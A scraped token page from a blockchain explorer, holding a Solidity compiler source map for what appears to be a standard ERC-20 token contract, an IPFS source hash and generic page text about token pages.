1:1;5677:2;5657:18;;;5650:30;5716:34;5696:18;;;5689:62;-1:-1:-1;;;5767:18:1;;;5760:35;5812:19;;11347:85:0;5610:227:1;11347:85:0;11443:67;4250:10;11466:7;11475:34;11494:15;11475:16;:34;:::i;11443:67::-;-1:-1:-1;11530:4:0;;11165:377;-1:-1:-1;;;11165:377:0:o;8343:175::-;8429:4;8446:42;4250:10;8470:9;8481:6;8446:9;:42::i;14967:215::-;15072:6;;15028:7;;15072:6;;;-1:-1:-1;;;;;15072:6:0;4250:10;-1:-1:-1;;;;;15056:22:0;;15048:72;;;;-1:-1:-1;;;15048:72:0;;2848:2:1;15048:72:0;;;2830:21:1;2887:2;2867:18;;;2860:30;2926:34;2906:18;;;2899:62;-1:-1:-1;;;2977:18:1;;;2970:35;3022:19;;15048:72:0;2820:227:1;15048:72:0;-1:-1:-1;15131:6:0;:17;;-1:-1:-1;;;;;;15131:17:0;;-1:-1:-1;;;;;15131:17:0;;;;;;;14967:215::o;14521:346::-;-1:-1:-1;;;;;14623:19:0;;14615:68;;;;-1:-1:-1;;;14615:68:0;;4879:2:1;14615:68:0;;;4861:21:1;4918:2;4898:18;;;4891:30;4957:34;4937:18;;;4930:62;-1:-1:-1;;;5008:18:1;;;5001:34;5052:19;;14615:68:0;4851:226:1;14615:68:0;-1:-1:-1;;;;;14702:21:0;;14694:68;;;;-1:-1:-1;;;14694:68:0;;3254:2:1;14694:68:0;;;3236:21:1;3293:2;3273:18;;;3266:30;3332:34;3312:18;;;3305:62;-1:-1:-1;;;3383:18:1;;;3376:32;3425:19;;14694:68:0;3226:224:1;14694:68:0;-1:-1:-1;;;;;14775:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;14827:32;;5988:25:1;;;14827:32:0;;5961:18:1;14827:32:0;;;;;;;14521:346;;;:::o;12032:604::-;-1:-1:-1;;;;;12138:20:0;;12130:70;;;;-1:-1:-1;;;12130:70:0;;4473:2:1;12130:70:0;;;4455:21:1;4512:2;4492:18;;;4485:30;4551:34;4531:18;;;4524:62;-1:-1:-1;;;4602:18:1;;;4595:35;4647:19;;12130:70:0;4445:227:1;12130:70:0;-1:-1:-1;;;;;12219:23:0;;12211:71;;;;-1:-1:-1;;;12211:71:0;;2444:2:1;12211:71:0;;;2426:21:1;2483:2;2463:18;;;2456:30;2522:34;2502:18;;;2495:62;-1:-1:-1;;;2573:18:1;;;2566:33;2616:19;;12211:71:0;2416:225:1;12211:71:0;-1:-1:-1;;;;;12379:17:0;;12355:21;12379:17;;;;;;;;;;;12415:23;;;;12407:74;;;;-1:-1:-1;;;12407:74:0;;3657:2:1;12407:74:0;;;3639:21:1;3696:2;3676:18;;;3669:30;3735:34;3715:18;;;3708:62;-1:-1:-1;;;3786:18:1;;;3779:36;3832:19;;12407:74:0;3629:228:1;12407:74:0;12512:22;12528:6;12512:13;:22;:::i;:::-;-1:-1:-1;;;;;12492:17:0;;;:9;:17;;;;;;;;;;;:42;;;;12545:20;;;;;;;;:30;;12569:6;;12492:9;12545:30;;12569:6;;12545:30;:::i;:::-;;;;;;;;12610:9;-1:-1:-1;;;;;12593:35:0;12602:6;-1:-1:-1;;;;;12593:35:0;;12621:6;12593:35;;;;5988:25:1;;5976:2;5961:18;;5943:76;12593:35:0;;;;;;;;12119:517;12032:604;;;:::o;14:173:1:-;82:20;;-1:-1:-1;;;;;131:31:1;;121:42;;111:2;;177:1;174;167:12;111:2;63:124;;;:::o;192:186::-;251:6;304:2;292:9;283:7;279:23;275:32;272:2;;;320:1;317;310:12;272:2;343:29;362:9;343:29;:::i;:::-;333:39;262:116;-1:-1:-1;;;262:116:1:o;383:260::-;451:6;459;512:2;500:9;491:7;487:23;483:32;480:2;;;528:1;525;518:12;480:2;551:29;570:9;551:29;:::i;:::-;541:39;;599:38;633:2;622:9;618:18;599:38;:::i;:::-;589:48;;470:173;;;;;:::o;648:328::-;725:6;733;741;794:2;782:9;773:7;769:23;765:32;762:2;;;810:1;807;800:12;762:2;833:29;852:9;833:29;:::i;:::-;823:39;;881:38;915:2;904:9;900:18;881:38;:::i;:::-;871:48;;966:2;955:9;951:18;938:32;928:42;;752:224;;;;;:::o;981:254::-;1049:6;1057;1110:2;1098:9;1089:7;1085:23;1081:32;1078:2;;;1126:1;1123;1116:12;1078:2;1149:29;1168:9;1149:29;:::i;:::-;1139:39;1225:2;1210:18;;;;1197:32;;-1:-1:-1;;;1068:167:1:o;1640:597::-;1752:4;1781:2;1810;1799:9;1792:21;1842:6;1836:13;1885:6;1880:2;1869:9;1865:18;1858:34;1910:1;1920:140;1934:6;1931:1;1928:13;1920:140;;;2029:14;;;2025:23;;2019:30;1995:17;;;2014:2;1991:26;1984:66;1949:10;;1920:140;;;2078:6;2075:1;2072:13;2069:2;;;2148:1;2143:2;2134:6;2123:9;2119:22;2115:31;2108:42;2069:2;-1:-1:-1;2221:2:1;2200:15;-1:-1:-1;;2196:29:1;2181:45;;;;2228:2;2177:54;;1761:476;-1:-1:-1;;;1761:476:1:o;6213:128::-;6253:3;6284:1;6280:6;6277:1;6274:13;6271:2;;;6290:18;;:::i;:::-;-1:-1:-1;6326:9:1;;6261:80::o;6346:125::-;6386:4;6414:1;6411;6408:8;6405:2;;;6419:18;;:::i;:::-;-1:-1:-1;6456:9:1;;6395:76::o;6476:380::-;6555:1;6551:12;;;;6598;;;6619:2;;6673:4;6665:6;6661:17;6651:27;;6619:2;6726;6718:6;6715:14;6695:18;6692:38;6689:2;;;6772:10;6767:3;6763:20;6760:1;6753:31;6807:4;6804:1;6797:15;6835:4;6832:1;6825:15;6689:2;;6531:325;;;:::o;6861:127::-;6922:10;6917:3;6913:20;6910:1;6903:31;6953:4;6950:1;6943:15;6977:4;6974:1;6967:15

Swarm Source

ipfs://cd09773747519649c0bcd7162ec0328e53eeb8b0ce3da9e3ab3d70d63677b816
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.